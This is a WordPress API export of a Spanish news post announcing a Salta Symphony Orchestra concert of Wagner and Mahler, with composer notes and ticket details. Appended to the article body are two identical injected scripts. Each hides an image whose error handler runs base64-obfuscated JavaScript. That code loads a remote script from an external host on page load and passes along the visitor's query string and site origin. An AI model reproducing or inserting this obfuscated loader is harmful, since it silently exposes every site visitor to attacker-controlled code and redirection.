{"id":2933,"date":"2023-08-01T10:41:17","date_gmt":"2023-08-01T13:41:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2933"},"modified":"2025-08-14T00:11:29","modified_gmt":"2025-08-14T03:11:29","slug":"obras-de-mahler-y-wagner-en-el-proximo-concierto-de-la-sinfonica-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2933","title":{"rendered":"Obras de Mahler y Wagner en el pr\u00f3ximo concierto de la Sinf\u00f3nica de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b5035c\"><em>El encuentro tendr\u00e1 lugar ma\u00f1ana mi\u00e9rcoles 2 de agosto a las 21 horas en el Teatro Provincial \u00abJuan Carlos Saravia\u00bb, Zuvir\u00eda 70.<\/em><\/h4>\n\n\n\n<p>Bajo la direcci\u00f3n de su Director Titular, Mtro.&nbsp;<strong>Gonzalo Hidalgo<\/strong>, la agrupaci\u00f3n orquestal ofrecer\u00e1 un nuevo concierto donde se interpretar\u00e1 Obertura Rienzi WWV 49 de Richard Wagner y la Sinfon\u00eda Nro.1 de Gustav Mahler.<\/p>\n\n\n\n<p>Cabe destacar que en el \u00faltimo concierto fue ovacionada por m\u00e1s de mil personas, ocasi\u00f3n en que interpret\u00f3 la Misa de R\u00e9quiem en re menor K. 626 de Wolfgang Amadeus Mozart junto al Estudio Coral Salta cuya direcci\u00f3n estuvo a cargo del Mtro. Luciano Garay.<\/p>\n\n\n\n<p>Las entradas generales de $500 est\u00e1n a la venta en www.saltaticket.gob.ar . Jubilados y estudiantes acceden de manera gratuita presentando tarjeta SAETA o certificaci\u00f3n que lo acredite.&nbsp;<\/p>\n\n\n\n<p><strong>Sobre los compositores y sus obras<\/strong><br>&nbsp;<\/p>\n\n\n\n<p>Richard Wagner (1813-1883) Compositor, director de orquesta, dramaturgo, poeta y te\u00f3rico musical del Romanticismo. Es conocido por sus \u00f3peras denominadas por \u00e9l mismo \u201cdramas musicales\u201d, en las que asume el libreto y la escenograf\u00eda, como en Lohengrin, El anillo del nibelungo, Trist\u00e1n e Isolda, El holand\u00e9s errante, etc. Transform\u00f3 el pensamiento musical con la idea de la \u00abobra de arte total\u00bb (Gesamtkunstwerk), s\u00edntesis de todas las artes po\u00e9ticas, visuales, musicales y esc\u00e9nicas, que desarrolla a partir de 1842 y que plasm\u00f3 en la primera mitad de su monumental tetralog\u00eda \u201cEl anillo del nibelungo\u201d. Wagner estaba obsesionado sobre lo que \u00e9l consideraba un cr\u00edtico panorama musical en Alemania ocasionado por la comercializaci\u00f3n capitalista. Su influencia se extendi\u00f3 a la filosof\u00eda, la literatura, las artes visuales y el teatro. Hizo construir su propio teatro de \u00f3pera, el Festspielhaus de Bayreuth, para escenificar sus obras, como las imaginaba, con sus novedosos dise\u00f1os.<br>&nbsp;<\/p>\n\n\n\n<p>Rienzi, der Letzte der Tribunen (Rienzi, el \u00faltimo de los tribunos) El libreto fue escrito por el compositor, basado en la novela de Edward Bulwer-Lytton del mismo t\u00edtulo. Es la tercera \u00f3pera completada por Wagner, escrita en un estilo que recuerda a la Grand Opera, aunque su construcci\u00f3n musical y dram\u00e1tica es muy superior a los t\u00edtulos de Grand Opera. El estreno en Dresde fue bien recibido por el p\u00fablico, a pesar de la duraci\u00f3n de seis horas. Fue una de las m\u00e1s exitosas durante los \u00faltimos a\u00f1os de la vida del compositor. Debido a su at\u00edpico estilo y su larga duraci\u00f3n, se representa poco en la actualidad.<br>&nbsp;<\/p>\n\n\n\n<p>Gustav Mahler (1860-1911) Compositor y director de orquesta austro-bohemio . Sus obras son consideradas, junto a las de Richard Strauss, las m\u00e1s importantes del posromanticismo. Durante sus diez a\u00f1os en la capital austriaca, Mahler \u2014jud\u00edo converso\u2014 sufri\u00f3 la hostilidad de la prensa antisemita, aunque gracias a sus innovadoras producciones fue reconocido como uno de los m\u00e1s grandes directores de \u00f3pera. Posteriormente, fue director de la Metropolitan Opera House y de la Orquesta Filarm\u00f3nica de Nueva York. Como compositor, centr\u00f3 sus esfuerzos en la sinfon\u00eda y en el lied. Consideraba que componer una sinfon\u00eda era \u00abconstruir un mundo con todos los medios posibles\u00bb, por lo que introdujo elementos de distinta procedencia a sus composiciones, como melod\u00edas populares, marchas, fanfarrias militares, de las que absorbi\u00f3 la tradici\u00f3n cl\u00e1sica vienesa. Al final de la Segunda Guerra Mundial su m\u00fasica fue interpretada con m\u00e1s frecuencia por las grandes orquestas. Mahler se encuentra entre los compositores m\u00e1s destacados de la historia de la m\u00fasica.<\/p>\n\n\n\n<p><br>La Sinfon\u00eda n.\u00ba 1 (1888) Su composici\u00f3n est\u00e1 relacionada con su primer ciclo de canciones, las \u201cCanciones de un camarada errante\u201d. La obra fue concebida como un largo poema sinf\u00f3nico en cinco movimientos, aunque despu\u00e9s de varias revisiones efectuadas por el autor, la obra adopt\u00f3 la forma definitiva de Sinfon\u00eda en cuatro movimientos. En la actualidad, es una de las sinfon\u00edas m\u00e1s apreciadas e interpretadas de Mahler, debido a su gran riqueza mel\u00f3dica.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/obras-de-mahler-y-wagner-en-el-proximo-concierto-de-la-sinfonica-de-salta-90963\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El encuentro tendr\u00e1 lugar ma\u00f1ana mi\u00e9rcoles 2 de agosto a las 21 horas en el Teatro Provincial \u00abJuan Carlos Saravia\u00bb, Zuvir\u00eda 70. Bajo la direcci\u00f3n de su Director Titular, Mtro.&nbsp;Gonzalo Hidalgo, la agrupaci\u00f3n orquestal ofrecer\u00e1 un nuevo concierto donde se interpretar\u00e1 Obertura Rienzi WWV 49 de Richard Wagner y la Sinfon\u00eda Nro.1 de Gustav Mahler. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2934,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2933","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2933"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2933"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2933\/revisions"}],"predecessor-version":[{"id":7007,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2933\/revisions\/7007"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2934"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}